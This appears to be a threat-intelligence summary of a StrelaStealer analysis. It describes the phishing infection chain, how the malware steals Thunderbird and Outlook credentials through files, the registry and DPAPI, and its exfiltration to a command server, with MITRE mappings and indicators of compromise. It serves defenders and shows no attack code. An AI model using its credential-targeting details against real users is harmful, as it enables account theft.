Threat Research

Unraveling StrelaStealer

Securonix

StrelaStealer is an email credential stealer targeting Outlook and Thunderbird clients, deployed through an email attachment whose JavaScript payload drops a batch file and a final DLL payload. The campaign is active in Europe, with a focus on Germany, and the analysis covers how it harvests Thunderbird credentials and decrypts Outlook passwords before exfiltrating data to its C2 server. #StrelaStealer #Outlook2016 #Thunderbird #Germany #Rundll32 #CryptUnprotectData

Keypoints

  • StrelaStealer targets Outlook and Thunderbird to steal email credentials (logins.json, key4.db for Thunderbird; IMAP credentials via Outlook 2016).
  • Active campaign observed in Europe, particularly Germany, with public attribution in reporting circles (Unit 42, AlienVault OTX referenced).
  • Infection chain starts with an email attachment delivering JavaScript, then a batch file drops to disk and obfuscated code unpacks the final payload.
  • A de-obfuscated Python step reveals a one-liner that downloads and executes the final DLL payload via a Windows execution flow (rundll32).
  • The final payload is delivered as a DLL and is shown to be encrypted; defenders can observe the use of Rundll32 to load the payload.
  • Outlook 2016 credential theft leverages a DPAPI/CryptUnprotectData path due to a known security flaw, enabling decryption of IMAP passwords under the same user context.
  • IOCs include a C2 IP address (45.9.74.32), sample hash c628d2fa4bf003a6abc6f98f0368fdf4fb4ec7759505f1e133c5ee5f194e8bc4, and references to Thunderbird/Outlook credential files and registry strings.

MITRE Techniques

  • [T1566.001] Phishing – StrelaStealer is delivered via an email attachment containing JavaScript payload. Quote: “StrelaStealer first delivers it’s payload in JavaScript via an email attachment, but we’ll skip that part for simplicity sake…”
  • [T1027] Obfuscated/Compressed Files and Information – The batch script is obfuscated. Quote: “The batch script is obfuscated. Each variable is set to a letter in the alphabet and numbers 0–9.”
  • [T1059.001] PowerShell – A one-liner downloads and executes the final DLL payload; PowerShell is involved in the delivery chain. Quote: “one-liner that downloads and executes the final DLL payload.”
  • [T1218.011] Rundll32 – The final payload is loaded via Rundll32 by pointing it to the StrelaStealer DLL. Quote: “Pointing Rundll32 to StrelaStealer.”
  • [T1552.001] Credentials in Files – Thunderbird credentials are stolen from logins.json and key4.db. Quote: “it looks for files logins.json and key4.db.”
  • [T1552.002] Credentials in Registry – Outlook credentials are extracted from the Outlook 2016 registry key (IMAP Server/User/Password). Quote: “the malware enumerates the key to extract the values for IMAP Server, IMAP User, and IMAP Password.”
  • [T1041] Exfiltration Over C2 Channel – Stolen credentials are sent to the C2 server. Quote: “Sending the stolen credentials to the C2 server.”
  • [T1082] System Information Discovery – GetKeyboardLayout is used to identify victim locale (Germany/Spain). Quote: “get the victims keyboard layout using GetKeyboardLayout. I’ve identified that this sample is targeting Germany and Spain.”

Indicators of Compromise

  • [Network] – 45.9.74.32 (C2 address) – observed in exfiltration communications to the C2 server
  • [File] – c628d2fa4bf003a6abc6f98f0368fdf4fb4ec7759505f1e133c5ee5f194e8bc4 (sample hash) – referenced in MalwareBazaar submission
  • [File] – logins.json, key4.db – Thunderbird credential files targeted by the malware
  • [Registry] – SOFTWAREMicrosoftOffice16.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A6676 – Outlook 2016 credential-related registry artifact

Read more: https://medium.com/@andrew.petrus/unraveling-strelastealer-5d56e150456e

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint